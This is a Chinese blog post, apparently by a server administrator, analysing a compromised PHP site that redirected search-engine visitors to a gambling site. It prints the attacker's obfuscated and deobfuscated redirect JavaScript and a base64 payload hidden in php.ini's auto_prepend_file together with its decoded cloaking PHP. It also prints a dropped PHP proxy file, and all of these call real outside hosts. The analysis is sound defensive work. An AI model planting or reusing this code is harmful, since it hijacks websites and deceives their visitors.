记录一次服务器被挂马的现象
早上接到运营的消息,说客户反馈网站通过搜索引擎打开时,显示为赌博网站。跟以往的情况不同,这次怎么都找不到被篡改的 PHP 文件,最后发现是配置文件被篡改。
现象
通过搜索引擎打开时,显示为赌博网站,页面被篡改。查看网页源代码,页面代码为:
<head><script type="text/javascript" src="https://aj88.cc/hm.js"></script></head>
整个页面被改写,加载了一个外部js文件,其内容为:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('n 2=c.2;g(2&&(2.4(\'B\')||2.4(\'k\')||2.4(\'A.y\')||2.4(\'k\')||2.4(\'x\')||2.4(\'w\'))){a 9=[\'u://v.D/\'];a 8=9[h.E(h.C()*9.o)];g(p.r.q(\'t\')!=-1){}f{b.s.m=8}a e="<j d=\'U: V; z-T: R; 6: 3%; 5: 3%; S:0;Z: 10(7, 7, 7);\'><i Y=\'"+8+"\' 5=\'3%\' 6=\'3%\' X=\'0\' W=\'I\'></i></j>";b["c"]["l"](e);b["c"]["l"]("<d J=\'K/F\'>G{5:3%;6:3%}H {5:3%;6:3%;O:P;Q:0}</d>")}f{L.M(\'N\')}',62,63,'||referrer|100|includes|width|height|255|Alibaba|items|var|window|document|style|JackMa|else|if|Math|iframe|div|sogou|write|href|const|length|navigator|indexOf|platform|location|Win32|https|aj68|bing|soso|cn||sm|baidu|random|cc|floor|css|html|body|nofollow|type|text|console|log|不需要跳转|overflow|hidden|margin|9846883647|inset|index|position|fixed|rel|frameborder|src|background|rgb'.split('|'),0,{}))
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?33bae04db2e39e71dad1b03ec0c65ea0";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
外部JS
解除混淆后,外部JS内容为:
const referrer=document.referrer;
if(referrer&&(referrer.includes('baidu')||referrer.includes('sogou')||referrer.includes('sm.cn')||referrer.includes('sogou')||referrer.includes('soso')||referrer.includes('bing'))){
var items=['https://aj68.cc/'];
var Alibaba=items[Math.floor(Math.random()*items.length)];
if(navigator.platform.indexOf('Win32')!=-1){
}else{
window.location.href=Alibaba
}
var JackMa="<div style='position: fixed; z-index: 9846883647; height: 100%; width: 100%; inset:0;background: rgb(255, 255, 255);'><iframe src='"+Alibaba+"' width='100%' height='100%' frameborder='0' rel='nofollow'></iframe></div>";
window["document"]["write"](JackMa);
window["document"]["write"]("<style type='text/css'>html{width:100%;height:100%}body {width:100%;height:100%;overflow:hidden;margin:0}</style>")
}else{
console.log('不需要跳转')
}
var _hmt = _hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "https://hm.baidu.com/hm.js?33bae04db2e39e71dad1b03ec0c65ea0";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s);
})();
可以看出,当来源地址包含 baidu
、sogou
、sm.cn
、sogou
、soso
和 bing
时,利用框架加载 https://aj68.cc/
网站。
后端文件
按照常规,全局搜索 php
文件,关键字为 baidu
,没有发现异常文件?
难道是混淆了代码?尝试断点代码,发现断到入口文件,甚至清空 PHP 文件都没用。
这就有意思了,应该是 WEB 软件或 PHP 出问题了。先来个 phpinfo()
,排查下配置文件。
果然,发现 auto_prepend_file 配置项有内容,并且是base64编码了。
其内容为:
data:;base64,PD9waHAKaGVhZGVyKCJDb250ZW50LXR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD11dGYtOCIpOwpzZXRfdGltZV9saW1pdCgzMCk7CmVycm9yX3JlcG9ydGluZygwKTsKaW5pX3NldCgndXNlcl9hZ2VudCcsJ01vemlsbGEvNS4wIChjb21wYXRpYmxlOyBCYWlkdXNwaWRlci8yLjA7ICtodHRwOi8vd3d3LmJhaWR1LmNvbS9zZWFyY2gvc3BpZGVyLmh0bWwpJyk7CiR1c2VyX2FnZW50ID0gJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOwokcmVmZXJyZXIgPSAkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107IAokaG9zdCA9ICRfU0VSVkVSWydIVFRQX0hPU1QnXTsKJHVyaSA9ICRfU0VSVkVSWydSRVFVRVNUX1VSSSddOwokcmhvc3QgPSBwcmVnX3JlcGxhY2UoIi9bXmEtekEtWjAtOV0vIiwgIiIsICRob3N0KTsKJHJ1cmkgPSBwcmVnX3JlcGxhY2UoIi9bXmEtekEtWjAtOV0vIiwgIiIsICR1cmkpOwokdXJsID0gImh0dHA6Ly8yNy4xMjQuMjEuMTI2Ii4iLyIuJHJob3N0LiIvIi4kcnVyaS4iLmh0bWwiOwokZXhwID0gYXJyYXkoJ2dvb2dsZS5jb20nLCd5YWhvby5jb20nLCdiaW5nLmNvbScsJ2JhaWR1LmNvbScsJ3NvZ291Jywnc29zbycsInNtIik7CmZvcmVhY2ggKCRleHAgYXMgJGVuZ2luZSkgewogIGlmIChzdHJwb3MoJHVzZXJfYWdlbnQsICRlbmdpbmUpICE9PSBmYWxzZSkgewogICAgJGZpbGVfY29udGVudHMgPSBmaWxlX2dldF9jb250ZW50cygkdXJsKTsKICAgIGVjaG8gJGZpbGVfY29udGVudHM7CiAgICBicmVhazsKICB9Cn07CiRpc19zZWFyY2hfZW5naW5lX3JlZmVycmFsID0gZmFsc2U7CmZvcmVhY2ggKCRleHAgYXMgJGVuZ2luZSkgewogIGlmIChzdHJwb3MoJHJlZmVycmVyLCAkZW5naW5lKSAhPT0gZmFsc2UpIHsKICAgIGVjaG8gJzxoZWFkPic7CiAgICBlY2hvICc8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgIHNyYz0iaHR0cHM6Ly9hajg4LmNjL2htLmpzIj48L3NjcmlwdD4nOwogICAgZWNobyAnPC9oZWFkPic7CiAgICBleGl0KCk7CiAgfQp9Owo/Pgo=
解码后内容为:
<?php
header("Content-type: text/html; charset=utf-8");
set_time_limit(30);
error_reporting(0);
ini_set('user_agent','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$referrer = $_SERVER['HTTP_REFERER'];
$host = $_SERVER['HTTP_HOST'];
$uri = $_SERVER['REQUEST_URI'];
$rhost = preg_replace("/[^a-zA-Z0-9]/", "", $host);
$ruri = preg_replace("/[^a-zA-Z0-9]/", "", $uri);
$url = "http://27.124.21.126"."/".$rhost."/".$ruri.".html";
$exp = array('google.com','yahoo.com','bing.com','baidu.com','sogou','soso',"sm");
foreach ($exp as $engine) {
if (strpos($user_agent, $engine) !== false) {
$file_contents = file_get_contents($url);
echo $file_contents;
break;
}
};
$is_search_engine_referral = false;
foreach ($exp as $engine) {
if (strpos($referrer, $engine) !== false) {
echo '<head>';
echo '<script type="text/javascript" src="https://aj88.cc/hm.js"></script>';
echo '</head>';
exit();
}
};
?>
解决办法
全局搜索 ini
配置文件(服务器内有多个 PHP 版本),关键字为 base64
,删除对应的异常配置内容即可。
其它
另外,站点内发现了个异常 PHP 文件,日期跟配置文件篡改的日期是同一天。在此记录一下内容:
<?php
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$TD_server = "http://at.zdxhn.com/";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);
echo $Content_mb;
?>
问题算是解决了,但是治标不治本,服务器环境比较老旧,不好排查,不知道怎么被入侵的。
为了解决问题,直接安全组关闭所有出站流量,勉强缓解下。